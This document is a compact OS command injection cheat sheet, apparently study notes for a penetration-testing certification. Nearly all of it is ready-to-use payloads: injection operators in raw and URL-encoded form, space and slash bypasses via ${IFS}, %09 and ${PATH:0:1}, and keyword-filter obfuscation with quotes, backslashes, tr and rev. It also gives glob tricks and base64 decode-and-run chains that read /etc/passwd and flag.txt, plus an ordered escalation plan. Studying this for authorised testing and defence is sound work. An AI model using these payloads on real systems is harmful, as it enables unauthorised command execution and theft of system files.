Command Injection
OS command injection from the CWES path: every injection operator (raw + URL-encoded), space/slash/semicolon bypasses, command obfuscation, glob matching, and base64 combined bypasses. Every payload separated.
Attack order
- Append each operator after the normal value, one at a time, until output appears:
;%0a&&||&| - Confirmed? run
id,hostname,cat /etc/passwd - Space blocked? →
%09/${IFS}/{cat,/etc/passwd} - Slash/semicolon blocked? →
${PATH:0:1}(gives/),${LS_COLORS:10:1}(gives;) - Keyword blocked? → quotes /
$@/ backslash / case-flip / reverse - Last resort → base64 decode-and-run
Injection operators
| Operator | Raw | URL-encoded | Behaviour |
|---|---|---|---|
| Semicolon | ; | %3b | runs both |
| Newline | \n | %0a | runs both |
| Background | & | %26 | runs both |
| Pipe | | | %7c | second output only |
| AND | && | %26%26 | second if first succeeds |
| OR | || | %7c%7c | second if first fails |
| Sub-shell | $() | %24%28%29 | inline (Linux) |
Semicolon:
127.0.0.1; whoamiNewline URL-encoded (most reliable, rarely blacklisted):
127.0.0.1%0awhoamiAND URL-encoded:
127.0.0.1%26%26whoamiSub-shell:
$(whoami)Space bypass
URL-encoded tab:
%09whoamiIFS variable:
cat${IFS}/etc/passwdBrace expansion (no space needed):
{cat,/etc/passwd}Slash / special char bypass
Extract / from PATH:
${PATH:0:1}Extract ; from LS_COLORS:
${LS_COLORS:10:1}Command obfuscation (keyword filter bypass)
Quotes inside the command:
w'h'o'am'iDollar-at (expands to nothing):
who$@amiBackslash:
w\ho\am\iCase swap via tr:
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")Reverse the string:
$(rev<<<'imaohw')Base64 decode-and-run:
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)Glob matching (no keywords)
/???/??t matches /bin/cat:
/???/??t /etc/passwdCombined bypasses (URL-encoded for GET)
Newline + base64 + tab:
%0abash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)Newline + cat with quotes + IFS + PATH slash:
%0ac'at'${IFS}${PATH:0:1}flag.txt